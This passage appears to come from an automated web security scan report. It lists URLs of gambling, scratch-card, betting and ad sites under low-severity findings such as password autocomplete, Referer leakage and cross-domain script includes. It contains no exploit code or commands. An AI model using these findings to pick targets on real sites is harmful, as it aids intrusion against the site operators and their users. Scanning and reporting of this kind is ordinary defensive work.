12.87. http://www.primescratchcards.com/index.asp
12.88. http://www.primescratchcards.com.br/
12.89. http://www.vincite.net/
12.90. http://www.winnings.com/
12.91. http://www.winnings.com/xmlrpc.php
12.92. http://ad.yieldmanager.com/imp
12.93. http://ad.yieldmanager.com/pixel
12.94. http://affiliates.interwetten.com/
12.95. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
12.96. http://b.scorecardresearch.com/b
12.97. http://bid.openx.net/json
12.98. http://br.bigmoneyscratch.com/Home.aspx
12.99. http://br.karamba.com/Home.aspx
12.100. http://d.tradex.openx.com/afr.php
12.101. http://d.tradex.openx.com/lg.php
12.102. http://da.bigmoneyscratch.com/Home.aspx
12.103. http://da.karamba.com/Home.aspx
12.104. http://da.scratch2cash.com/Home.aspx
12.105. http://da.scratchcardheaven.com/Home.aspx
12.106. http://de.bigmoneyscratch.com/Home.aspx
12.107. http://de.karamba.com/Home.aspx
12.108. http://de.scratch2cash.com/Home.aspx
12.109. http://de.scratchcardheaven.com/Home.aspx
12.110. http://el.karamba.com/Home.aspx
12.111. http://es.bigmoneyscratch.com/Home.aspx
12.112. http://es.karamba.com/Home.aspx
12.113. http://es.scratch2cash.com/Home.aspx
12.114. http://es.scratchcardheaven.com/Home.aspx
12.115. http://fi.bigmoneyscratch.com/Home.aspx
12.116. http://fi.karamba.com/Home.aspx
12.117. http://fi.scratchcardheaven.com/Home.aspx
12.118. http://fr.bigmoneyscratch.com/Home.aspx
12.119. http://fr.karamba.com/Home.aspx
12.120. http://fr.scratch2cash.com/Home.aspx
12.121. http://fr.scratchcardheaven.com/Home.aspx
12.122. http://home.okscratchcards.com/AboutUs.aspx
12.123. http://home.okscratchcards.com/ContactUsMail.aspx
12.124. http://home.okscratchcards.com/FairPlay.aspx
12.125. http://home.okscratchcards.com/PlayersClub.aspx
12.126. http://home.okscratchcards.com/Promotions.aspx
12.127. http://home.okscratchcards.com/Responsible.aspx
12.128. http://home.okscratchcards.com/SecurityAndPrivacy.aspx
12.129. http://home.okscratchcards.com/Terms.aspx
12.130. http://home.okscratchcards.com/help.aspx
12.131. http://home.okscratchcards.com/visit.aspx
12.132. http://it.bigmoneyscratch.com/Home.aspx
12.133. http://it.karamba.com/Home.aspx
12.134. http://it.scratch2cash.com/Home.aspx
12.135. http://it.scratchcardheaven.com/Home.aspx
12.136. http://m.xp1.ru4.com/ad
12.138. http://nl.bigmoneyscratch.com/Home.aspx
12.139. http://nl.karamba.com/Home.aspx
12.140. http://nl.scratch2cash.com/Home.aspx
12.141. http://nl.scratchcardheaven.com/Home.aspx
12.142. http://no.bigmoneyscratch.com/Home.aspx
12.143. http://no.karamba.com/Home.aspx
12.144. http://no.scratchcardheaven.com/Home.aspx
12.145. http://pixel.invitemedia.com/data_sync
12.146. http://pixel.quantserve.com/pixel
12.147. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif
12.148. http://primescratchcards.com/images/HelpDepositMethods.asp
12.149. http://primescratchcards.com/images/InviteFriend.asp
12.150. http://primescratchcards.com/images/Responsible.asp
12.151. http://primescratchcards.com/images/SecurityAndPrivacy.asp
12.152. http://primescratchcards.com/images/aboutus.asp
12.153. http://primescratchcards.com/images/affiliates.asp
12.154. http://primescratchcards.com/images/contactus.asp
12.155. http://primescratchcards.com/images/fairplay.asp
12.156. http://primescratchcards.com/images/help.asp
12.157. http://primescratchcards.com/images/index.asp
12.158. http://primescratchcards.com/images/media.asp
12.159. http://primescratchcards.com/images/playersclub.asp
12.160. http://primescratchcards.com/images/promotions.asp
12.161. http://primescratchcards.com/images/terms.asp
12.162. http://primescratchcards.com/images/underage.asp
12.163. http://pt.bigmoneyscratch.com/Home.aspx
12.164. http://pt.karamba.com/Home.aspx
12.165. http://pt.scratch2cash.com/Home.aspx
12.166. http://pt.scratchcardheaven.com/Home.aspx
12.168. http://scratch.co.uk/about/
12.169. http://scratch.co.uk/contact/
12.170. http://scratch.co.uk/help/
12.171. http://scratch.co.uk/help/deposit/methods/
12.172. http://scratch.co.uk/help/fairplay/
12.173. http://scratch.co.uk/help/privacy/
12.174. http://scratch.co.uk/invite-friend/
12.175. http://scratch.co.uk/over-18/
12.176. http://scratch.co.uk/problem-gambling/
12.177. http://scratch.co.uk/promotions/
12.178. http://scratch.co.uk/terms/
12.179. http://scratch.co.uk/vis-club/
12.180. http://scratch.co.uk/winners/
12.181. http://server.iad.liveperson.net/hc/15712222/
12.182. http://server.iad.liveperson.net/hc/15712222/
12.183. http://server.iad.liveperson.net/hc/15712222/
12.184. http://sv.bigmoneyscratch.com/Home.aspx
12.185. http://sv.karamba.com/Home.aspx
12.186. http://sv.scratch2cash.com/Home.aspx
12.187. http://sv.scratchcardheaven.com/Home.aspx
12.188. http://twitter.com/PostcodeLottery
12.189. http://twitter.com/PrimeScratch
12.190. http://twitter.com/crazyscratch
12.191. http://twitter.com/ukscratch
12.192. http://va.px.invitemedia.com/goog_imp
12.193. http://winter.metacafe.com/Openx/www/delivery/lg.php
12.194. http://www.bet365.com/extra/en/betting/in-play
12.195. http://www.bet365.com/extra/en/betting/live-streaming
12.196. http://www.bet365.com/extra/en/mobile/introduction/
12.197. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed
12.198. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back
12.199. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus
12.200. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx
12.201. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js
12.202. https://www.betsson.com/start/en/
12.203. https://www.betsson.com/start/is/
12.204. https://www.betsson.com/web/en/sportsbook/
12.205. http://www.bigmoneyscratch.com/
12.206. http://www.bigmoneyscratch.com/AboutUs.aspx
12.207. http://www.bigmoneyscratch.com/Affiliates.aspx
12.208. http://www.bigmoneyscratch.com/ContactUsChat.aspx
12.209. http://www.bigmoneyscratch.com/ContactUsFax.aspx
12.210. http://www.bigmoneyscratch.com/ContactUsMail.aspx
12.211. http://www.bigmoneyscratch.com/ContactUsTel.aspx
12.212. http://www.bigmoneyscratch.com/FAQ.aspx
12.213. http://www.bigmoneyscratch.com/FairPlay.aspx
12.214. http://www.bigmoneyscratch.com/Help.aspx
12.215. http://www.bigmoneyscratch.com/Home.aspx
12.216. http://www.bigmoneyscratch.com/InviteFriend.aspx
12.217. http://www.bigmoneyscratch.com/Mobile.aspx
12.218. http://www.bigmoneyscratch.com/PlayersClub.aspx
12.219. http://www.bigmoneyscratch.com/Promotions.aspx
12.220. http://www.bigmoneyscratch.com/Responsible.aspx
12.221. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx
12.222. http://www.bigmoneyscratch.com/Terms.aspx
12.223. http://www.bigmoneyscratch.com/UnderAge.aspx
12.224. http://www.facebook.com/
12.225. http://www.facebook.com/PrimeScratchCards
12.226. http://www.facebook.com/WinningsCom
12.227. http://www.facebook.com/crazyscratch
12.228. http://www.facebook.com/pages/BigMoneyScratch/156518521055171
12.229. http://www.facebook.com/pages/PrimeScratchCards/122783514413813
12.230. http://www.facebook.com/peoplespostcodelottery
12.231. http://www.gambleaware.co.uk/
12.232. http://www.gamblersanonymous.org.uk/
12.234. http://www.hopa.com/visit.aspx
12.235. http://www.info.crazyscratch.com/AboutUs.aspx
12.236. http://www.info.crazyscratch.com/ContactUsFax.aspx
12.237. http://www.info.crazyscratch.com/ContactUsMail.aspx
12.238. http://www.info.crazyscratch.com/ContactUsTel.aspx
12.239. http://www.info.crazyscratch.com/FairPlay.aspx
12.240. http://www.info.crazyscratch.com/Help.aspx
12.241. http://www.info.crazyscratch.com/InviteFriend.aspx
12.242. http://www.info.crazyscratch.com/PlayersClub.aspx
12.243. http://www.info.crazyscratch.com/Privacy.aspx
12.244. http://www.info.crazyscratch.com/Promotions.aspx
12.245. http://www.info.crazyscratch.com/Responsible.aspx
12.246. http://www.info.crazyscratch.com/Terms.aspx
12.247. http://www.info.crazyscratch.com/UnderAge.aspx
12.248. http://www.info.crazyscratch.com/visit.aspx
12.249. http://www.info.winnings.com/visit.aspx
12.250. https://www.interwetten.com/
12.251. http://www.karamba.com/
12.252. http://www.karamba.com/AboutUs.aspx
12.253. http://www.karamba.com/FairPlay.aspx
12.254. http://www.karamba.com/Help.aspx
12.255. http://www.karamba.com/Home.aspx
12.256. http://www.karamba.com/InviteFriend.aspx
12.257. http://www.karamba.com/PlayersClub.aspx
12.258. http://www.karamba.com/Privacy.aspx
12.259. http://www.karamba.com/Promotions.aspx
12.260. http://www.karamba.com/Responsible.aspx
12.261. http://www.karamba.com/Sitemap.aspx
12.262. http://www.karamba.com/Terms.aspx
12.263. http://www.karamba.com/UnderAge.aspx
12.264. http://www.karamba.com/click/Karamba.com/ENG/Home/
12.265. http://www.mundirasca.com/
12.266. http://www.mundirasca.com/AboutUs.aspx
12.267. http://www.mundirasca.com/ContactUsChat.aspx
12.268. http://www.mundirasca.com/ContactUsFax.aspx
12.269. http://www.mundirasca.com/ContactUsMail.aspx
12.270. http://www.mundirasca.com/ContactUsTel.aspx
12.271. http://www.mundirasca.com/FAQ.aspx
12.272. http://www.mundirasca.com/FairPlay.aspx
12.273. http://www.mundirasca.com/Help.aspx
12.274. http://www.mundirasca.com/Home.aspx
12.275. http://www.mundirasca.com/InviteFriend.aspx
12.276. http://www.mundirasca.com/PlayersClub.aspx
12.277. http://www.mundirasca.com/Promotions.aspx
12.278. http://www.mundirasca.com/Responsible.aspx
12.279. http://www.mundirasca.com/SecurityAndPrivacy.aspx
12.280. http://www.mundirasca.com/Terms.aspx
12.281. http://www.mundirasca.com/UnderAge.aspx
12.282. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/
12.283. http://www.neteller.com/
12.284. http://www.pclscratch.com/ContactUsMail.aspx
12.285. http://www.pclscratch.com/FairPlay.aspx
12.286. http://www.pclscratch.com/Promotions.aspx
12.287. http://www.pclscratch.com/Responsible.aspx
12.288. http://www.pclscratch.com/SecurityAndPrivacy.aspx
12.289. http://www.pclscratch.com/Terms.aspx
12.290. http://www.postcodelottery.com/AboutUs.htm
12.291. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm
12.292. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm
12.293. http://www.postcodelottery.com/Charities.htm
12.294. http://www.postcodelottery.com/DrawResults.htm
12.295. http://www.postcodelottery.com/FunGames.htm
12.296. http://www.postcodelottery.com/FunGames/FreeGames.htm
12.297. http://www.postcodelottery.com/FunGames/PaidGames.htm
12.298. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
12.299. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm
12.300. http://www.postcodelottery.com/Games/Scratchcards.htm
12.301. http://www.postcodelottery.com/Home.htm
12.302. http://www.postcodelottery.com/HowItWorks.htm
12.303. http://www.postcodelottery.com/MyAccount.htm
12.304. http://www.postcodelottery.com/RSS.htm
12.305. http://www.postcodelottery.com/Sitemap.htm
12.306. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
12.307. http://www.primescratchcards.com/HelpDepositMethods.asp
12.308. http://www.primescratchcards.com/InviteFriend.asp
12.309. http://www.primescratchcards.com/Responsible.asp
12.310. http://www.primescratchcards.com/SecurityAndPrivacy.asp
12.311. http://www.primescratchcards.com/aboutus.asp
12.312. http://www.primescratchcards.com/affiliates.asp
12.313. http://www.primescratchcards.com/contactus.asp
12.314. http://www.primescratchcards.com/fairplay.asp
12.315. http://www.primescratchcards.com/help.asp
12.316. http://www.primescratchcards.com/media.asp
12.317. http://www.primescratchcards.com/playersclub.asp
12.318. http://www.primescratchcards.com/promotions.asp
12.319. http://www.primescratchcards.com/terms.asp
12.320. http://www.primescratchcards.com/underage.asp
12.321. http://www.scratch2cash.com/
12.322. http://www.scratch2cash.com/AboutUs.aspx
12.323. http://www.scratch2cash.com/ContactUsMail.aspx
12.324. http://www.scratch2cash.com/FairPlay.aspx
12.325. http://www.scratch2cash.com/Help.aspx
12.326. http://www.scratch2cash.com/Home.aspx
12.327. http://www.scratch2cash.com/InviteFriend.aspx
12.328. http://www.scratch2cash.com/PlayersClub.aspx
12.329. http://www.scratch2cash.com/Promotions.aspx
12.330. http://www.scratch2cash.com/Responsible.aspx
12.331. http://www.scratch2cash.com/SecurityAndPrivacy.aspx
12.332. http://www.scratch2cash.com/Sitemap.aspx
12.333. http://www.scratch2cash.com/Terms.aspx
12.334. http://www.scratch2cash.com/UnderAge.aspx
12.335. http://www.scratchcardheaven.com/
12.336. http://www.scratchcardheaven.com/AboutUs.aspx
12.337. http://www.scratchcardheaven.com/ContactUsMail.aspx
12.338. http://www.scratchcardheaven.com/FairPlay.aspx
12.339. http://www.scratchcardheaven.com/Help.aspx
12.340. http://www.scratchcardheaven.com/Home.aspx
12.341. http://www.scratchcardheaven.com/InviteFriend.aspx
12.342. http://www.scratchcardheaven.com/PlayersClub.aspx
12.343. http://www.scratchcardheaven.com/Promotions.aspx
12.344. http://www.scratchcardheaven.com/Responsible.aspx
12.345. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx
12.346. http://www.scratchcardheaven.com/Terms.aspx
12.347. http://www.scratchcardheaven.com/UnderAge.aspx
12.348. http://www.svenskalotter.com/
12.349. http://www.svenskalotter.com/AboutUs.aspx
12.350. http://www.svenskalotter.com/Affiliates.aspx
12.351. http://www.svenskalotter.com/Charity.aspx
12.352. http://www.svenskalotter.com/ContactUsMail.aspx
12.353. http://www.svenskalotter.com/FairPlay.aspx
12.354. http://www.svenskalotter.com/Help.aspx
12.355. http://www.svenskalotter.com/Home.aspx
12.356. http://www.svenskalotter.com/InviteFriend.aspx
12.357. http://www.svenskalotter.com/PlayersClub.aspx
12.358. http://www.svenskalotter.com/Promotions.aspx
12.359. http://www.svenskalotter.com/Responsible.aspx
12.360. http://www.svenskalotter.com/SecurityAndPrivacy.aspx
12.361. http://www.svenskalotter.com/Terms.aspx
12.362. http://www.svenskalotter.com/UnderAge.aspx
12.363. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/
12.364. http://www.thawte.com/
12.365. https://www.thawte.com/
12.366. http://www.verisign.co.uk/
12.367. http://www.visa.co.uk/
12.368. http://www.winnings.com/comments/feed
12.369. http://www.winnings.com/feed
12.370. http://www.winnings.com/how-to-win-money
12.371. http://www.winnings.com/instant-games
12.372. http://www.winnings.com/lottery-scratch-cards
12.373. http://www.winnings.com/scratch-cards
12.374. http://www.winnings.com/site-map
12.375. http://www.winnings.com/slots
12.376. http://www.winnings.com/wp-admin/admin-ajax.php
12.377. http://www.youtube.com/user/CrazyScratchCom
12.378. http://www.youtube.com/user/PostcodeLottery
12.379. http://www.youtube.com/user/primescratchcards1
12.380. http://www.youtube.com/v/
13. Password field with autocomplete enabled
13.1. http://affiliates.interwetten.com/
13.2. http://bingo.bet365.com/play/en/home/
13.3. https://bingo.betsson.com/en/
13.4. http://casino.bet365.com/extra/en/online-games/baccarat
13.5. http://casino.bet365.com/extra/en/online-games/blackjack
13.6. http://casino.bet365.com/extra/en/online-games/live-dealer
13.7. http://casino.bet365.com/extra/en/online-games/roulette
13.8. http://casino.bet365.com/home/en/
13.9. https://casino.betsson.com/en/
13.10. http://games.bet365.com/home/en/
13.11. https://games.betsson.com/en/
13.12. https://livecasino.betsson.com/en/
13.13. http://poker.bet365.com/home/en/
13.14. https://poker.betsson.com/en/
13.15. https://scratch.betsson.com/en/
13.16. https://scratch.betsson.com/en/
13.17. https://scratch.betsson.com/en/Casino
13.18. https://scratch.betsson.com/en/Casino/Bingo-Bonanza
13.19. https://scratch.betsson.com/en/Casino/Bubble-Bingo
13.20. https://scratch.betsson.com/en/Casino/Disco-Keno
13.21. https://scratch.betsson.com/en/Casino/HiLo
13.22. https://scratch.betsson.com/en/Casino/Lucky-21
13.23. https://scratch.betsson.com/en/Casino/Namaste
13.24. https://scratch.betsson.com/en/Casino/Poker-King
13.25. https://scratch.betsson.com/en/Casino/Roulette
13.26. https://scratch.betsson.com/en/Casino/Royal-Slots
13.27. https://scratch.betsson.com/en/Casino/Slot-Super-7
13.28. https://scratch.betsson.com/en/Classic
13.29. https://scratch.betsson.com/en/Classic/3-Wow
13.30. https://scratch.betsson.com/en/Classic/7th-Heaven
13.31. https://scratch.betsson.com/en/Classic/Champagne
13.32. https://scratch.betsson.com/en/Classic/Golden-Fortune
13.33. https://scratch.betsson.com/en/Classic/Happy-Birthday
13.34. https://scratch.betsson.com/en/Classic/Jungle-Joy
13.35. https://scratch.betsson.com/en/Classic/Neighbors
13.36. https://scratch.betsson.com/en/Classic/Spy-Comics
13.37. https://scratch.betsson.com/en/Classic/Super-3-Wow
13.38. https://scratch.betsson.com/en/Classic/Tiger-Mahjong
13.39. https://scratch.betsson.com/en/Classic/Wild-West
13.40. https://scratch.betsson.com/en/Classic/XO
13.41. https://scratch.betsson.com/en/Default.aspx
13.42. https://scratch.betsson.com/en/FAQ
13.43. https://scratch.betsson.com/en/Fantasy
13.44. https://scratch.betsson.com/en/Fantasy/Cash-Farm
13.45. https://scratch.betsson.com/en/Fantasy/Club-Pearl
13.46. https://scratch.betsson.com/en/Fantasy/Crazy-Cat
13.47. https://scratch.betsson.com/en/Fantasy/Dancing-Domino
13.48. https://scratch.betsson.com/en/Fantasy/Fast-Hands
13.49. https://scratch.betsson.com/en/Fantasy/Golden-Island
13.50. https://scratch.betsson.com/en/Fantasy/Knights-Battle
13.51. https://scratch.betsson.com/en/Fantasy/Love-Birds
13.52. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds
13.53. https://scratch.betsson.com/en/Fantasy/Master-Mix
13.54. https://scratch.betsson.com/en/Fantasy/Memory-Madness
13.55. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl
13.56. https://scratch.betsson.com/en/Fantasy/Outer-Space
13.57. https://scratch.betsson.com/en/Fantasy/Super-Chance
13.58. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale
13.59. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya
13.60. https://scratch.betsson.com/en/Fantasy/Treasure-Island
13.61. https://scratch.betsson.com/en/Fantasy/Zodiac
13.62. https://scratch.betsson.com/en/GameHistory
13.63. https://scratch.betsson.com/en/Information
13.64. https://scratch.betsson.com/en/News
13.65. https://scratch.betsson.com/en/OurScratchcards
13.66. https://scratch.betsson.com/en/Ourwinners
13.67. https://scratch.betsson.com/en/Slots/5th-Avenue
13.68. https://scratch.betsson.com/en/Slots/Adventure-Jack
13.69. https://scratch.betsson.com/en/Slots/Atlantis
13.70. https://scratch.betsson.com/en/Slots/Bon-Apetit
13.71. https://scratch.betsson.com/en/Slots/Cafe-Paris
13.72. https://scratch.betsson.com/en/Slots/Castle-Slots
13.73. https://scratch.betsson.com/en/Slots/Chic-Boutique
13.74. https://scratch.betsson.com/en/Slots/Conga-Beat
13.75. https://scratch.betsson.com/en/Slots/Egyptian-Magic
13.76. https://scratch.betsson.com/en/Slots/Esmeralda
13.77. https://scratch.betsson.com/en/Slots/Fair-Play
13.78. https://scratch.betsson.com/en/Slots/Fantasia
13.79. https://scratch.betsson.com/en/Slots/Grand-Crown
13.80. https://scratch.betsson.com/en/Slots/Holiday-Hotel
13.81. https://scratch.betsson.com/en/Slots/Ice-Land
13.82. https://scratch.betsson.com/en/Slots/Legend-Of-Terra
13.83. https://scratch.betsson.com/en/Slots/Monaco-Glamour
13.84. https://scratch.betsson.com/en/Slots/Monte-Carlo
13.85. https://scratch.betsson.com/en/Slots/Pirates-Paradise
13.86. https://scratch.betsson.com/en/Slots/Sakura-Garden
13.87. https://scratch.betsson.com/en/Slots/Sea-And-Sun
13.88. https://scratch.betsson.com/en/Slots/Sky-Of-Love
13.89. https://scratch.betsson.com/en/Slots/Triple-Carnival
13.90. https://scratch.betsson.com/en/Slots/Tropical-Fruit
13.91. https://scratch.betsson.com/en/Sports/100m-Champion
13.92. https://scratch.betsson.com/en/Sports/Bowling
13.93. https://scratch.betsson.com/en/Sports/Darts
13.94. https://scratch.betsson.com/en/Sports/Goal-Kick
13.95. https://scratch.betsson.com/en/Sports/Gone-Fishing
13.96. https://scratch.betsson.com/en/Sports/Hippodrome
13.97. https://scratch.betsson.com/en/Sports/Ready-Set-Go
13.98. https://scratch.betsson.com/en/Sports/Road-Racing
13.99. https://scratch.betsson.com/en/Sports/World-Champions
13.100. http://twitter.com/PostcodeLottery
13.101. http://twitter.com/PrimeScratch
13.102. http://twitter.com/crazyscratch
13.103. http://twitter.com/ukscratch
13.104. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
13.105. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
13.106. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
13.107. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
13.108. http://www.bet365.com/extra/en/betting/in-play
13.109. http://www.bet365.com/extra/en/betting/live-streaming
13.110. http://www.bet365.com/extra/en/mobile/introduction/
13.111. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed
13.112. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back
13.113. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus
13.114. https://www.betsson.com/start/en/
13.115. https://www.betsson.com/start/is/
13.116. https://www.betsson.com/web/en/sportsbook/
13.117. http://www.crazyrewards.com/
13.118. http://www.facebook.com/
13.119. http://www.facebook.com/
13.120. http://www.facebook.com/
13.121. http://www.facebook.com/PrimeScratchCards
13.122. http://www.facebook.com/WinningsCom
13.123. http://www.facebook.com/crazyscratch
13.124. http://www.facebook.com/peoplespostcodelottery
13.125. http://www.heavenaffiliates.com/
13.126. https://www.interwetten.com/Header-Contact
13.127. https://www.interwetten.com/Header-Help-FAQ
13.128. https://www.interwetten.com/Header-Menu-Casino
13.129. https://www.interwetten.com/Header-Menu-Home
13.130. https://www.interwetten.com/Header-Menu-Live
13.131. https://www.interwetten.com/Header-Menu-Sportsbook
13.132. https://www.interwetten.com/Header-Payment-possibilities
13.133. https://www.interwetten.com/Header-Tutorials
13.134. https://www.interwetten.com/ScriptResource.axd
13.135. https://www.interwetten.com/WebResource.axd
13.136. https://www.interwetten.com/en/Default.aspx
13.137. https://www.interwetten.com/en/american-football-betting
13.138. https://www.interwetten.com/en/australian-rules-football-betting
13.139. https://www.interwetten.com/en/beach-soccer-betting
13.140. https://www.interwetten.com/en/boxing-betting
13.141. https://www.interwetten.com/en/casino/default.aspx
13.142. https://www.interwetten.com/en/cycling-betting
13.143. https://www.interwetten.com/en/darts-betting
13.144. https://www.interwetten.com/en/default.aspx
13.145. https://www.interwetten.com/en/football-betting
13.146. https://www.interwetten.com/en/games/default.aspx
13.147. https://www.interwetten.com/en/golf-betting
13.148. https://www.interwetten.com/en/handball-betting
13.149. https://www.interwetten.com/en/ice-hockey-betting
13.150. https://www.interwetten.com/en/livebets
13.151. https://www.interwetten.com/en/motorbikes-betting
13.152. https://www.interwetten.com/en/online-skillgames
13.153. https://www.interwetten.com/en/politics-betting
13.154. https://www.interwetten.com/en/rugby-betting
13.155. https://www.interwetten.com/en/sailing-betting
13.156. https://www.interwetten.com/en/scratch/default.aspx
13.157. https://www.interwetten.com/en/ski-alpine-betting
13.158. https://www.interwetten.com/en/skill/default.aspx
13.159. https://www.interwetten.com/en/sportsbook/default.aspx
13.160. https://www.interwetten.com/en/tennis-betting
13.161. https://www.interwetten.com/en/volleyball-betting
13.162. https://www.interwetten.com/en/water-polo-betting
13.163. https://www.interwetten.com/en/winter-games-betting
13.164. http://www.postcodelottery.com/MyAccount.htm
13.165. http://www.tstglobal.com/
13.166. http://www.verisign.co.uk/
14.1. http://neogames-tech.com/
14.2. http://neogames-tech.com/careers
14.3. http://neogames-tech.com/contact-us
14.4. http://neogames-tech.com/corporate
14.5. http://neogames-tech.com/corporate/gaming-license
14.6. http://neogames-tech.com/products
14.7. http://www.neogames.com/
14.8. http://www.neogames.com/contact-us
14.9. http://www.neogames.com/corporate
14.11. http://www.neogames.com/news-and-events/neogames-launches-38-games-in-2010
14.12. http://www.neogames.com/our-partners
14.13. http://www.neogames.com/products
15.1. http://affiliates.interwetten.com/Default.aspx
15.2. http://www.gamblingtherapy.org/Default.aspx
15.3. http://www.paypoint.co.uk/Default.aspx
16. Referer-dependent response
16.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
16.2. http://d.tradex.openx.com/afr.php
16.3. http://www.facebook.com/PrimeScratchCards
16.4. http://www.facebook.com/plugins/likebox.php
16.5. http://www.primescratchcards.com/index.asp
17.1. http://leandrovieira.com/projects/jquery/lightbox/
17.2. http://www.huddletogether.com/projects/lightbox2/
18. Cross-domain Referer leakage
18.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
18.2. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
18.3. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
18.4. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
18.5. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427
18.6. http://ad.yieldmanager.com/imp
18.7. http://d.tradex.openx.com/afr.php
18.8. http://home.okscratchcards.com/Promotions.aspx
18.9. http://home.okscratchcards.com/visit.aspx
18.10. http://itunes.apple.com/us/app/pclottery/id399201446
18.11. http://primescratchcards.com/images/index.asp
18.12. https://scratch.betsson.com/en/
18.13. https://scratch.betsson.com/en/
18.15. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx
18.16. https://secure.neogames-tech.com/ScratchCards/js/LoadObjects.js
18.17. https://www.aspireaffiliates.com/
18.18. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
18.19. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
18.20. https://www.aspireaffiliates.com/marketing-samples/
18.21. https://www.aspireaffiliates.com/mobile/
18.22. http://www.bigmoneyscratch.com/Home.aspx
18.23. http://www.facebook.com/
18.24. http://www.facebook.com/WinningsCom
18.25. http://www.facebook.com/plugins/likebox.php
18.26. http://www.facebook.com/plugins/likebox.php
18.27. http://www.incomate.com/
18.28. http://www.info.crazyscratch.com/AboutUs.aspx
18.29. http://www.info.crazyscratch.com/ContactUsMail.aspx
18.30. http://www.info.crazyscratch.com/FairPlay.aspx
18.31. http://www.info.crazyscratch.com/Help.aspx
18.32. http://www.info.crazyscratch.com/InviteFriend.aspx
18.33. http://www.info.crazyscratch.com/PlayersClub.aspx
18.34. http://www.info.crazyscratch.com/Privacy.aspx
18.35. http://www.info.crazyscratch.com/Promotions.aspx
18.36. http://www.info.crazyscratch.com/Responsible.aspx
18.37. http://www.info.crazyscratch.com/Terms.aspx
18.38. http://www.info.crazyscratch.com/UnderAge.aspx
18.39. https://www.interwetten.com/en/default.aspx
18.40. http://www.karamba.com/Home.aspx
18.41. http://www.lga.org.mt/lga/content.aspx
18.42. https://www.neogamespartners.com/
18.43. http://www.okscratchcards.com/
18.44. http://www.okscratchcards.com/terms-and-conditions.aspx
18.45. http://www.primescratchcards.com/index.asp
18.46. http://www.scratch2cash.com/Home.aspx
18.47. http://www.scratchcardheaven.com/Home.aspx
18.48. http://www.trustlogo.com/ttb_searcher/trustlogo
18.49. http://www.vincite.net/
19. Cross-domain script include
19.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
19.2. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427
19.3. https://bingo.betsson.com/en/
19.4. http://blog.postcodelottery.com/
19.5. http://br.bigmoneyscratch.com/Home.aspx
19.7. http://casino.bet365.com/home/en/
19.8. https://casino.betsson.com/en/
19.9. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US
19.10. http://d.tradex.openx.com/afr.php
19.11. http://da.bigmoneyscratch.com/Home.aspx
19.12. http://da.winnings.com/
19.13. http://de.bigmoneyscratch.com/Home.aspx
19.14. http://de.winnings.com/
19.15. http://el.winnings.com/
19.16. http://es.bigmoneyscratch.com/Home.aspx
19.17. http://es.winnings.com/
19.18. http://fi.bigmoneyscratch.com/Home.aspx
19.19. http://fi.winnings.com/
19.20. http://fr.bigmoneyscratch.com/Home.aspx
19.21. http://fr.winnings.com/
19.22. http://games.bet365.com/home/en/
19.23. https://games.betsson.com/en/
19.24. http://getclicky.com/66384109
19.25. http://it.bigmoneyscratch.com/Home.aspx
19.26. http://itunes.apple.com/us/app/pclottery/id399201446
19.28. http://leandrovieira.com/projects/jquery/lightbox/
19.29. https://livecasino.betsson.com/en/
19.31. http://nl.bigmoneyscratch.com/Home.aspx
19.32. http://nl.winnings.com/
19.33. http://no.bigmoneyscratch.com/Home.aspx
19.34. http://no.winnings.com/
19.35. http://okscratchcards.com/
19.36. http://poker.bet365.com/home/en/
19.37. https://poker.betsson.com/en/
19.38. http://pt.bigmoneyscratch.com/Home.aspx
19.39. http://pt.winnings.com/
19.40. http://ronaldheft.com/code/analyticator/
19.41. https://scratch.betsson.com/en/
19.42. https://scratch.betsson.com/en/Casino
19.43. https://scratch.betsson.com/en/Casino/Bingo-Bonanza
19.44. https://scratch.betsson.com/en/Casino/Bubble-Bingo
19.45. https://scratch.betsson.com/en/Casino/Disco-Keno
19.46. https://scratch.betsson.com/en/Casino/HiLo
19.47. https://scratch.betsson.com/en/Casino/Lucky-21
19.48. https://scratch.betsson.com/en/Casino/Namaste
19.49. https://scratch.betsson.com/en/Casino/Poker-King
19.50. https://scratch.betsson.com/en/Casino/Roulette
19.51. https://scratch.betsson.com/en/Casino/Royal-Slots
19.52. https://scratch.betsson.com/en/Casino/Slot-Super-7
19.53. https://scratch.betsson.com/en/Classic
19.54. https://scratch.betsson.com/en/Classic/3-Wow
